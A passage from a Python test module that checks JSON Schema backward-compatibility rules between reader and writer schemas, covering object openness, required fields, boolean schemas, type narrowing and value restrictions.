reader=B_NUM_C_INT_OBJECT_SCHEMA,
writer=B_NUM_C_INT_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ARRAY_OF_POSITIVE_INTEGER,
writer=ARRAY_OF_POSITIVE_INTEGER,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ARRAY_OF_POSITIVE_INTEGER_THROUGH_REF,
writer=ARRAY_OF_POSITIVE_INTEGER_THROUGH_REF,
msg=reflexivity_msg,
)
def test_extra_optional_field_with_open_model_is_compatible() -> None:
# - the reader is an open model, so the extra field produced by the writer is
# automatically accepted
schemas_are_compatible(
reader=OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_TRUE_SCHEMA,
)
schemas_are_compatible(
reader=TRUE_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_TRUE_SCHEMA,
)
schemas_are_compatible(
reader=EMPTY_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_TRUE_SCHEMA,
)
# - the writer is a closed model, so the field `b` was never produced, which
# means that the writer never produced an invalid value.
# - the reader's `b` field is optional, so the absence of the field is not
# a problem, and `a` is ignored because of the open model
schemas_are_compatible(
reader=B_INT_OPEN_OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES,
)
# - if the model is closed, then `a` must also be accepted
schemas_are_compatible(
reader=A_INT_B_INT_OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_NEW_FIELD_IS_NOT_REQUIRED,
)
# Examples a bit more complex
schemas_are_compatible(
reader=A_DINT_B_NUM_C_DINT_OBJECT_SCHEMA,
writer=A_DINT_B_NUM_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_NEW_FIELD_IS_NOT_REQUIRED,
)
schemas_are_compatible(
reader=B_NUM_C_DINT_OPEN_OBJECT_SCHEMA,
writer=A_DINT_B_NUM_C_DINT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES,
)
schemas_are_compatible(
reader=B_NUM_C_INT_OPEN_OBJECT_SCHEMA,
writer=A_DINT_B_NUM_OBJECT_SCHEMA,
msg=f"{COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES} + {COMPATIBLE_READER_NEW_FIELD_IS_NOT_REQUIRED}",
)
schemas_are_compatible(
reader=B_NUM_C_DINT_OPEN_OBJECT_SCHEMA,
writer=A_DINT_B_NUM_OBJECT_SCHEMA,
msg=f"{COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES} + {COMPATIBLE_READER_NEW_FIELD_IS_NOT_REQUIRED}",
)
def test_extra_field_with_closed_model_is_incompatible() -> None:
# The false schema always fails validation, so the values produced by the
# writer won't be valid.
# https://json-schema.org/draft/2020-12/json-schema-core.html#rfc.section.4.3.2
#
# not_schemas_are_compatible(
# reader=FALSE_SCHEMA,
# writer=A_INT_OBJECT_SCHEMA,
# msg=INCOMPATIBLE_READER_IS_FALSE_SCHEMA,
# )
not_schemas_are_compatible(
reader=A_INT_OBJECT_SCHEMA,
writer=FALSE_SCHEMA,
msg=INCOMPATIBLE_READER_IS_FALSE_SCHEMA,
)
not_schemas_are_compatible(
reader=NOT_OF_TRUE_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_IS_FALSE_SCHEMA,
)
not_schemas_are_compatible(
reader=NOT_OF_EMPTY_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_IS_FALSE_SCHEMA,
)
not_schemas_are_compatible(
reader=B_INT_OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_IS_CLOSED_AND_REMOVED_FIELD,
)
not_schemas_are_compatible(
reader=B_NUM_C_INT_OBJECT_SCHEMA,
writer=A_DINT_B_NUM_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_IS_CLOSED_AND_REMOVED_FIELD,
)
not_schemas_are_compatible(
reader=B_NUM_C_INT_OBJECT_SCHEMA,
writer=A_DINT_B_NUM_C_DINT_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_IS_CLOSED_AND_REMOVED_FIELD,
)
def test_missing_required_field_is_incompatible() -> None:
not_schemas_are_compatible(
reader=A_INT_B_INT_REQUIRED_OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_HAS_A_NEW_REQUIRED_FIELDg,
)
# The writer is not producing the value `b`, which is required by the
# reader
# not_schemas_are_compatible(
# reader=A_INT_B_DINT_REQUIRED_OBJECT_SCHEMA,
# writer=A_INT_OBJECT_SCHEMA,
# msg=INCOMPATIBLE_READER_HAS_A_NEW_REQUIRED_FIELDg,
# )
not_schemas_are_compatible(
reader=A_INT_OBJECT_SCHEMA,
writer=A_INT_B_DINT_REQUIRED_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_HAS_A_NEW_REQUIRED_FIELDg,
)
def test_giving_a_default_value_for_a_non_required_field_is_compatible() -> None:
schemas_are_compatible(
reader=OBJECT_SCHEMA,
writer=A_DINT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_TRUE_SCHEMA,
)
schemas_are_compatible(
reader=TRUE_SCHEMA,
writer=A_DINT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_TRUE_SCHEMA,
)
schemas_are_compatible(
reader=EMPTY_SCHEMA,
writer=A_DINT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_TRUE_SCHEMA,
)
schemas_are_compatible(
reader=B_DINT_OPEN_OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_TRUE_SCHEMA,
)
schemas_are_compatible(
reader=A_INT_B_DINT_OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_NEW_FIELD_IS_NOT_REQUIRED,
)
schemas_are_compatible(
reader=A_DINT_B_INT_OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_NEW_FIELD_IS_NOT_REQUIRED,
)
schemas_are_compatible(
reader=B_NUM_C_DINT_OPEN_OBJECT_SCHEMA,
writer=A_DINT_B_NUM_OBJECT_SCHEMA,
msg=f"{COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES} + {COMPATIBLE_READER_NEW_FIELD_IS_NOT_REQUIRED}",
)
schemas_are_compatible(
reader=A_DINT_B_DINT_OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE, # field B was anything, now it is an int
)
schemas_are_compatible(
reader=A_DINT_B_DINT_OBJECT_SCHEMA,
writer=EMPTY_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_NEW_FIELD_IS_NOT_REQUIRED,
)
def test_boolean_schemas_are_backward_compatible() -> None:
# reader is the false schema, which never accepts a value
# https://json-schema.org/draft/2020-12/json-schema-core.html#rfc.section.4.3.2
# not_schemas_are_compatible(
# reader=FALSE_SCHEMA,
# writer=TRUE_SCHEMA,
# msg=INCOMPATIBLE_READER_IS_FALSE_SCHEMA,
# )
schemas_are_compatible(
reader=FALSE_SCHEMA,
writer=TRUE_SCHEMA,
msg=INCOMPATIBLE_READER_IS_FALSE_SCHEMA,
)
schemas_are_compatible(
reader=TRUE_SCHEMA,
writer=FALSE_SCHEMA,
msg=INCOMPATIBLE_READER_IS_FALSE_SCHEMA,
)
def test_from_closed_to_open_is_incompatible() -> None:
not_schemas_are_compatible(
reader=B_NUM_C_INT_OBJECT_SCHEMA,
writer=B_NUM_C_DINT_OPEN_OBJECT_SCHEMA,
msg="The reader is closed model and rejects the fields ignored by the writer",
)
def test_union_with_incompatible_elements() -> None:
not_schemas_are_compatible(
reader=ONEOF_ARRAY_B_NUM_C_INT_SCHEMA,
writer=ONEOF_ARRAY_A_DINT_B_NUM_SCHEMA,
msg=INCOMPATIBLE_READER_IS_CLOSED_AND_REMOVED_FIELD,
)
def test_union_with_compatible_elements() -> None:
schemas_are_compatible(
reader=ONEOF_ARRAY_B_NUM_C_DINT_OPEN_SCHEMA,
writer=ONEOF_ARRAY_A_DINT_B_NUM_SCHEMA,
msg=COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES,
)
def test_array_and_tuples_are_incompatible() -> None:
# both tuples and arrays are represented using lists, so this should be
# compatible
# schemas_are_compatible(
# reader=ARRAY_OF_INT_SCHEMA,
# writer=TUPLE_OF_INT_OPEN_SCHEMA,
# msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
# )
# schemas_are_compatible(
# reader=ARRAY_OF_INT_SCHEMA,
# writer=TUPLE_OF_INT_INT_SCHEMA,
# msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
# )
not_schemas_are_compatible(
reader=TUPLE_OF_INT_OPEN_SCHEMA,
writer=ARRAY_OF_INT_SCHEMA,
msg=COMPATIBILIY,
)
not_schemas_are_compatible(
reader=ARRAY_OF_INT_SCHEMA,
writer=TUPLE_OF_INT_OPEN_SCHEMA,
msg=COMPATIBILIY,
)
def test_true_schema_is_compatible_with_object() -> None:
for schema in OBJECT_SCHEMAS + BOOLEAN_SCHEMAS:
if schema != TRUE_SCHEMA:
schemas_are_compatible(
reader=TRUE_SCHEMA,
writer=schema,
msg=COMPATIBILIY,
)
for schema in NON_OBJECT_SCHEMAS:
not_schemas_are_compatible(
reader=TRUE_SCHEMA,
writer=schema,
msg=COMPATIBILIY,
)
def test_schema_compatibility_successes() -> None:
# allowing a broader set of values is compatible
schemas_are_compatible(
reader=NUMBER_SCHEMA,
writer=INT_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
reader=ARRAY_OF_NUMBER_SCHEMA,
writer=ARRAY_OF_INT_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
reader=TUPLE_OF_INT_OPEN_SCHEMA,
writer=TUPLE_OF_INT_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
reader=TUPLE_OF_INT_WITH_ADDITIONAL_INT_SCHEMA,
writer=TUPLE_OF_INT_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
reader=ENUM_ABC_SCHEMA,
writer=ENUM_AB_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
reader=ONEOF_STRING_INT_SCHEMA,
writer=ONEOF_STRING_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
reader=ONEOF_STRING_INT_SCHEMA,
writer=STRING_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
reader=A_INT_OPEN_OBJECT_SCHEMA,
writer=A_INT_B_INT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES,
)
# requiring fewer values is compatible
schemas_are_compatible(
reader=TUPLE_OF_INT_OPEN_SCHEMA,
writer=TUPLE_OF_INT_INT_OPEN_SCHEMA,
msg=COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES,
)
schemas_are_compatible(
reader=TUPLE_OF_INT_OPEN_SCHEMA,
writer=TUPLE_OF_INT_INT_SCHEMA,
msg=COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES,
)
# equivalences
schemas_are_compatible(
reader=ONEOF_STRING_SCHEMA,
writer=STRING_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
reader=STRING_SCHEMA,
writer=ONEOF_STRING_SCHEMA,
msg=COMPATIBLE_READER_EVERY_VALUE_IS_ACCEPTED,
)
# new non-required fields are compatible
schemas_are_compatible(
reader=A_INT_OBJECT_SCHEMA,
writer=EMPTY_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_EVERY_VALUE_IS_ACCEPTED,
)
schemas_are_compatible(
reader=A_INT_B_INT_OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_EVERY_VALUE_IS_ACCEPTED,
)
def test_type_narrowing_incompabilities() -> None:
not_schemas_are_compatible(
reader=INT_SCHEMA,
writer=NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=ARRAY_OF_INT_SCHEMA,
writer=ARRAY_OF_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=ENUM_AB_SCHEMA,
writer=ENUM_ABC_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=ENUM_BC_SCHEMA,
writer=ENUM_ABC_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=ONEOF_INT_SCHEMA,
writer=ONEOF_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=ONEOF_STRING_SCHEMA,
writer=ONEOF_STRING_INT_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=INT_SCHEMA,
writer=ONEOF_STRING_INT_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
def test_type_mismatch_incompabilities() -> None:
not_schemas_are_compatible(
reader=BOOLEAN_SCHEMA,
writer=INT_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=INT_SCHEMA,
writer=BOOLEAN_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=STRING_SCHEMA,
writer=BOOLEAN_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=STRING_SCHEMA,
writer=INT_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=ARRAY_OF_INT_SCHEMA,
writer=ARRAY_OF_STRING_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=TUPLE_OF_INT_INT_SCHEMA,
writer=TUPLE_OF_INT_OPEN_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=TUPLE_OF_INT_INT_OPEN_SCHEMA,
writer=TUPLE_OF_INT_OPEN_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=INT_SCHEMA,
writer=ENUM_AB_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=ENUM_AB_SCHEMA,
writer=INT_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
def test_true_and_false_schemas() -> None:
schemas_are_compatible(
writer=NOT_OF_EMPTY_SCHEMA,
reader=NOT_OF_TRUE_SCHEMA,
msg="both schemas reject every value",
)
# the schemas below are just different ways of representing the same schema
# schemas_are_compatible(
# writer=NOT_OF_TRUE_SCHEMA,
# reader=FALSE_SCHEMA,
# msg="both schemas reject every value",
# )
# schemas_are_compatible(
# writer=NOT_OF_EMPTY_SCHEMA,
# reader=FALSE_SCHEMA,
# msg="both schemas reject every value",
# )
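# For reference, a hedged sketch of the three "reject everything" spellings
# assumed here (the actual constants are defined earlier in this module):
#   FALSE_SCHEMA        ~ False
#   NOT_OF_TRUE_SCHEMA  ~ {"not": True}
#   NOT_OF_EMPTY_SCHEMA ~ {"not": {}}
# None of them validates any instance, so any pair of them is trivially
# compatible in either direction.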
schemas_are_compatible(
writer=TRUE_SCHEMA,
reader=EMPTY_SCHEMA,
msg="both schemas accept every value",
)
# the true schema accepts anything ... including nothing
# schemas_are_compatible(
# writer=NOT_OF_EMPTY_SCHEMA,
# reader=TRUE_SCHEMA,
# msg=COMPATIBLE_READER_EVERY_VALUE_IS_ACCEPTED,
# )
# schemas_are_compatible(
# writer=NOT_OF_TRUE_SCHEMA,
# reader=TRUE_SCHEMA,
# msg=COMPATIBLE_READER_EVERY_VALUE_IS_ACCEPTED,
# )
# the reader rejects every value
not_schemas_are_compatible(
writer=TRUE_SCHEMA,
reader=NOT_OF_EMPTY_SCHEMA,
msg=INCOMPATIBLE_READER_IS_FALSE_SCHEMA,
)
not_schemas_are_compatible(
writer=TRUE_SCHEMA,
reader=NOT_OF_TRUE_SCHEMA,
msg=INCOMPATIBLE_READER_IS_FALSE_SCHEMA,
)
not_schemas_are_compatible(
writer=TRUE_SCHEMA,
reader=A_INT_B_INT_REQUIRED_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
writer=FALSE_SCHEMA,
reader=A_INT_B_INT_REQUIRED_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_HAS_A_NEW_REQUIRED_FIELD,
)
not_schemas_are_compatible(
writer=NOT_OF_TRUE_SCHEMA,
reader=FALSE_SCHEMA,
msg=COMPATIBILIY,
)
not_schemas_are_compatible(
writer=FALSE_SCHEMA,
reader=NOT_OF_TRUE_SCHEMA,
msg=COMPATIBILIY,
)
not_schemas_are_compatible(
writer=FALSE_SCHEMA,
reader=NOT_OF_EMPTY_SCHEMA,
msg=COMPATIBILIY,
)
not_schemas_are_compatible(
writer=NOT_OF_EMPTY_SCHEMA,
reader=FALSE_SCHEMA,
msg=COMPATIBILIY,
)
not_schemas_are_compatible(
writer=TRUE_SCHEMA,
reader=NOT_OF_EMPTY_SCHEMA,
msg=COMPATIBILIY,
)
not_schemas_are_compatible(
writer=NOT_OF_EMPTY_SCHEMA,
reader=TRUE_SCHEMA,
msg=COMPATIBILIY,
)
not_schemas_are_compatible(
writer=TRUE_SCHEMA,
reader=NOT_OF_TRUE_SCHEMA,
msg=COMPATIBILIY,
)
not_schemas_are_compatible(
writer=NOT_OF_TRUE_SCHEMA,
reader=TRUE_SCHEMA,
msg=COMPATIBILIY,
)
def test_schema_restrict_attributes_is_incompatible() -> None:
not_schemas_are_compatible(
writer=STRING_SCHEMA,
reader=MAX_LENGTH_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=MAX_LENGTH_SCHEMA,
reader=MAX_LENGTH_DECREASED_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=STRING_SCHEMA,
reader=MIN_LENGTH_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=MIN_LENGTH_SCHEMA,
reader=MIN_LENGTH_INCREASED_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=STRING_SCHEMA,
reader=MIN_PATTERN_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=MIN_PATTERN_SCHEMA,
reader=MIN_PATTERN_STRICT_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=INT_SCHEMA,
reader=MAXIMUM_INTEGER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=INT_SCHEMA,
reader=MAXIMUM_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=NUMBER_SCHEMA,
reader=MAXIMUM_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=MAXIMUM_NUMBER_SCHEMA,
reader=MAXIMUM_DECREASED_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=INT_SCHEMA,
reader=MINIMUM_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=NUMBER_SCHEMA,
reader=MINIMUM_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=MINIMUM_NUMBER_SCHEMA,
reader=MINIMUM_INCREASED_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=INT_SCHEMA,
reader=EXCLUSIVE_MAXIMUM_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=NUMBER_SCHEMA,
reader=EXCLUSIVE_MAXIMUM_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=EXCLUSIVE_MAXIMUM_NUMBER_SCHEMA,
reader=EXCLUSIVE_MAXIMUM_DECREASED_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=NUMBER_SCHEMA,
reader=EXCLUSIVE_MINIMUM_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=INT_SCHEMA,
reader=EXCLUSIVE_MINIMUM_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=EXCLUSIVE_MINIMUM_NUMBER_SCHEMA,
reader=EXCLUSIVE_MINIMUM_INCREASED_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=OBJECT_SCHEMA,
reader=MAX_PROPERTIES_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=MAX_PROPERTIES_SCHEMA,
reader=MAX_PROPERTIES_DECREASED_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=OBJECT_SCHEMA,
reader=MIN_PROPERTIES_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=MIN_PROPERTIES_SCHEMA,
reader=MIN_PROPERTIES_INCREASED_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=ARRAY_SCHEMA,
reader=MAX_ITEMS_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=MAX_ITEMS_SCHEMA,
reader=MAX_ITEMS_DECREASED_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=ARRAY_SCHEMA,
reader=MIN_ITEMS_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
not_schemas_are_compatible(
writer=MIN_ITEMS_SCHEMA,
reader=MIN_ITEMS_INCREASED_SCHEMA,
msg=INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES,
)
def test_schema_broadening_attributes_is_compatible() -> None:
schemas_are_compatible(
writer=MAX_LENGTH_SCHEMA,
reader=STRING_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MAX_LENGTH_DECREASED_SCHEMA,
reader=MAX_LENGTH_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MIN_LENGTH_SCHEMA,
reader=STRING_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MIN_LENGTH_INCREASED_SCHEMA,
reader=MIN_LENGTH_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MIN_PATTERN_SCHEMA,
reader=STRING_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MAXIMUM_INTEGER_SCHEMA,
reader=INT_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MAXIMUM_NUMBER_SCHEMA,
reader=NUMBER_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MAXIMUM_DECREASED_NUMBER_SCHEMA,
reader=MAXIMUM_NUMBER_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MINIMUM_INTEGER_SCHEMA,
reader=INT_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MINIMUM_NUMBER_SCHEMA,
reader=NUMBER_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MINIMUM_INCREASED_NUMBER_SCHEMA,
reader=MINIMUM_NUMBER_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=EXCLUSIVE_MAXIMUM_INTEGER_SCHEMA,
reader=INT_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=EXCLUSIVE_MAXIMUM_NUMBER_SCHEMA,
reader=NUMBER_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=EXCLUSIVE_MAXIMUM_DECREASED_NUMBER_SCHEMA,
reader=EXCLUSIVE_MAXIMUM_NUMBER_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=EXCLUSIVE_MINIMUM_NUMBER_SCHEMA,
reader=NUMBER_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=EXCLUSIVE_MINIMUM_INTEGER_SCHEMA,
reader=INT_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=EXCLUSIVE_MINIMUM_INCREASED_NUMBER_SCHEMA,
reader=EXCLUSIVE_MINIMUM_NUMBER_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MAX_PROPERTIES_SCHEMA,
reader=OBJECT_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MAX_PROPERTIES_DECREASED_SCHEMA,
reader=MAX_PROPERTIES_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MIN_PROPERTIES_SCHEMA,
reader=OBJECT_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MIN_PROPERTIES_INCREASED_SCHEMA,
reader=MIN_PROPERTIES_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MAX_ITEMS_SCHEMA,
reader=ARRAY_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MAX_ITEMS_DECREASED_SCHEMA,
reader=MAX_ITEMS_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MIN_ITEMS_SCHEMA,
reader=ARRAY_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
writer=MIN_ITEMS_INCREASED_SCHEMA,
reader=MIN_ITEMS_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
def test_pattern_properties() -> None:
schemas_are_compatible(
reader=OBJECT_SCHEMA,
writer=PATTERN_PROPERTY_ASTAR_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES,
)
# In backward compatibility mode it is allowed to delete fields
schemas_are_compatible(
reader=A_OBJECT_SCHEMA,
writer=PATTERN_PROPERTY_ASTAR_OBJECT_SCHEMA,
msg=COMPATIBILIY,
)
# In backward compatibility mode it is allowed to add optional fields
schemas_are_compatible(
